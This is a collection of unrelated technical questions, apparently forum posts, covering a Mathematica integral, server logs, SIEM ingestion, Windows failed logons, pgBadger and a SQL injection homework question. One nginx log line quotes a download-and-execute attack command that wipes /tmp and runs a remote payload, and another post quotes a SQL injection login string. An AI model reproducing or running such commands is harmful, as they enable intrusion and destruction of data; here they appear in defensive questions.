I’m trying to find the integral given below with Mathematica
$int_0^{infty } r frac{2^{r-1} log (2) e^{-frac{sqrt{2^r-1}}{b}} left(2^r-1right)^{frac{d}{2}-1}}{b^d Gamma (d)} , dr$
However, it takes too long for it to return something and when it returns it outputs the same integral.
$int_{0}^{infty } frac{2^{r-1} r log (2) b^{-d} e^{-frac{sqrt{2^r-1}}{b}} left(2^r-1right)^{frac{d}{2}-1}}{Gamma (d)} , dr$
I’d like to figure out the solution for this integral.
I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:
170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - - "GET / HTTP/1.1" 301 169 "http://(IP OF MY SERVER):80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - - "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - - "GET / HTTP/1.1" 400 157 "-" "-"
The IPs are, needless to say, not expected for this server.
I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?
I state that I do not have a solid background in security. I am a software developer and I am writing here to start to reasoning about a new task (somehow related to security) that I have to implement and maybe someone of you can help me to clarify the situation.
Basically I have to implement the following thing: an application produces logs (standard output text files) and I have to bring these logs into QRADAR SIEM.
So my doubts are:
From what I know (absolutly not sure of this assertion): first of all I have to convert these log files into CEF format (Common Event Format) and I can give this format to QRADAR. It make sense for you?
What about the automatic import of this converted CEF format? QRADAR provides an API that I can call passing it the events or something similar?
I instrument the app to make it log a message at the entry and exit of each method. The size of each message is about 12 characters.
However I find some messages read from logcat are lost (I indexed each message to check this).
E.g. (a – b means logs from a to b are missing)
missing logs: 468 – 749
missing logs: 1308 – 1428
missing logs: 1725 – 1942
missing logs: 2023 – 2034
missing logs: 2375 – 2646
missing logs: 3075 – 3288
I also tried buffering the messages up to 400 characters then call Log.println() once it’s filled up, instead of calling Log.println() each time. When I do this, there’s no message lost.
Since the size of messages totally is the same in both ways, the problem is not the size of logcat ring buffer (I also set the size to maximum: 256M).
Is it because the app logs too frequently?
I need to figure out the bottleneck queries in my system. Since I remember using bgBadger years ago, in the era when I still tortured myself with Unix, I went to their website to fetch the Windows installer and start re-figuring out how to use it…
https://pgbadger.darold.net/#download
There is no Windows installer. There is actually no mention of Windows whatsoever.
Does this mean that this is one of those FOSS projects which pretend that Windows doesn’t exist and make it as difficult as possible to run it on the “one and only” desktop OS? I frankly expected that slick site to have a nice installer, which PostgreSQL and PostGIS have, but… apparently not?
I strongly suspect that pgBadger is the best such software, but I’m also willing to listen if there is an excellent Windows-supporting alternative.
PS: I don’t like Windows. It’s a living nightmare these days. It’s just that the “alternatives” are even worse in my long and consistent experience. Whether you agree with this or not, this is what I have been forced to conclude repeatedly over the last 20 years.
A fairly new MS Windows Server 2019 VM installation is logging over a hundred Security Log Audit Failures a day with Event ID 4625.
RDP for the server is enabled only for a single trusted WAN source IP through the Draytek Firewall.
The server hosts 2 local applications and an on-premises Exchange Server. The PDC is another VM on the same physical bare metal Hyper-V Core host.
The Account Names, Source IP addresses and Workstation names appear to be quite random, though the workstation name “workstation” appears quite frequently.
An example log entry is:
An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: Hp
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: workstation
Source Network Address: 40.117.34.82
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
So my immediate thoughts are:
I’m kinda shitting myself right now as we’ve only just installed this server to replace an old Windows Server 2011 that got hit by ransomware.
I’ve heard about using programs like IPBan, but that would only seem to make sense if the attempts were from the same IP. In this case they seem to be from random addresses.
Would I be right in thinking having the necessary ports open for the Exchange Server (80,443,587) is the only reason these attempts from WAN IPs are even reaching the server? Is there anything I can do to prevent these log-on attempts from reaching the server or is this a level of intrusion to be expected when running an Exchange server?
I’ll be more specific, I’m studying Internet Security and in my homeworks I must answer to the question that I will describe later; I learned something about code injection in older websites (using the string ‘ OR 1 == 1 // as username will login with any password provided); but what if password related to a username is stored in the server in a folder with the following path:
“/userdata/passwords/”
which credentials will log me into the system, without knowing any legitimate usernames or passwords?
Furthermore in the question it’s specified that the login system is installed on a computer running an OS, and that this operating system is known to have a file with its version (in this case, 1.0.3) in “/system/version.txt”.
Honestly I do not know how this last thing can be related to the question, but I hope that someone can help me to understand what could be the right answer and if and how this thing about the system version is related to the answer.
Thank you very much 🙂
I have a server with disk quota problem, I will do migration soon but need get some time until do this.
Can I remove files in directory “/var/log” for get disk quota?:
maillog-123456789: I have many files with this name
cxs.log: I have only 1 file with this name, but her size is 273MB
chkservd.log: I have only 1 file with this name, but her size is 103MB
Thank you very much.
My family has a shared computer were we all have accounts. This is an Xubuntu 20.04 system running lightdm as the user manager. For whatever reason, whenever I login to my account, then lock the screen, then switch to another user, then try to switch back to my account and log back in, I’m faced with a screensaver login window (not xscreensaver) and I it doesn’t let me log back in. It doesn’t even let me type anything in the password dialog. The only way back in is for my to switch to a VT console and then kill off my user processes or to just logout every time, which is annoying.
I’ve upgraded this machine a few times and I’m wondering if there is some user setting on just my account that is corrupting my session such that I can’t log back in. Any ideas?
I want to load information about queries execution from log of PostgreSQL to database table. I want such information as query execution time, query start time, query text. Does any simple solution exist?
pgBadger allows to make some analysis, but I want to have access to data about individual query execution for analysis.